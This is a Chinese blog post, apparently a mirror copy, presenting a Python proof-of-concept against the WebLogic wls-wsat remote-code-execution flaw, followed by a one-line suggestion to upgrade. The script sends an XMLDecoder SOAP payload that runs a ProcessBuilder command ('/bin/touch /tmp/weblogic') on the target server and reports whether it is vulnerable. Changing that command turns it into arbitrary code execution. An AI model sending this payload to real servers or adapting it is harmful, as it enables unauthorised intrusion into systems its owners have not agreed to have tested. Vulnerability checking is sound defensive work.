zoukankan      html  css  js  c++  java
  • Weblogic wls RCE 漏洞验证POC

    #!/usr/bin/env python
    # coding:utf-8
    # @Date    : 2017/12/22 17:11
    # @File    : weblogic_poc.py
    # @Author  : sevck 
    # @Link    : http://www.qingteng.cn                  
    #-------------------------------------------------------------------------  
    import requests
    import re
    from sys import argv
    
    heads = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'Content-Type': 'text/xml;charset=UTF-8'
        }
    
    def poc(url):
        if not url.startswith("http"):
            url = "http://" + url
        if "/" in url:
            url += '/wls-wsat/CoordinatorPortType'
        post_str = '''
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
              <java>
                <void class="java.lang.ProcessBuilder">
                  <array class="java.lang.String" length="2">
                    <void index="0">
                      <string>/bin/touch</string>
                    </void>
                    <void index="1">
                      <string>/tmp/weblogic</string>
                    </void>
                  </array>
                  <void method="start"/>
                </void>
              </java>
            </work:WorkContext>
          </soapenv:Header>
          <soapenv:Body/>
        </soapenv:Envelope>
        '''
    
        try:
            response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
            response = response.text
            response = re.search(r"<faultstring>.*</faultstring>", response).group(0)
        except Exception, e:
            response = ""
    
        if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
            result = "Vulnerability"
            return result
        else:
            result = "No Vulnerability"
            return result
    
    
    if __name__ == '__main__':
        if len(argv) == 1:
            print "python weblogic_poc.py url:port"
            exit(0)
        else:
            url = argv[1]
        result = poc(url=url)
        print result

    说点修复建议:

    个人建议直接更新最新版吧,老版本还是问题太多。昨晚和廖师父聊天中告知又提交了一个weblogic的RCE,已经拿到CVE就在等待发布了

  • 相关阅读:
    postgres 如何把多行数据,合并一行,返回json字符串
    linux 安装中文字体(生成图片中文乱码解决)
    postgis 自相交数据检测 修复
    C# Winform程序如何获取运行路径, 控制台也可以
    Excel: Access is denied
    change the theme in VS2005 or VS2008
    接下来的一点计划
    wordwrap, breakword
    T SQL + 正则表达式
    神奇的Css + DIV,滚动的Grid
  • 原文地址:https://www.cnblogs.com/sevck/p/8092760.html
Copyright © 2011-2022 走看看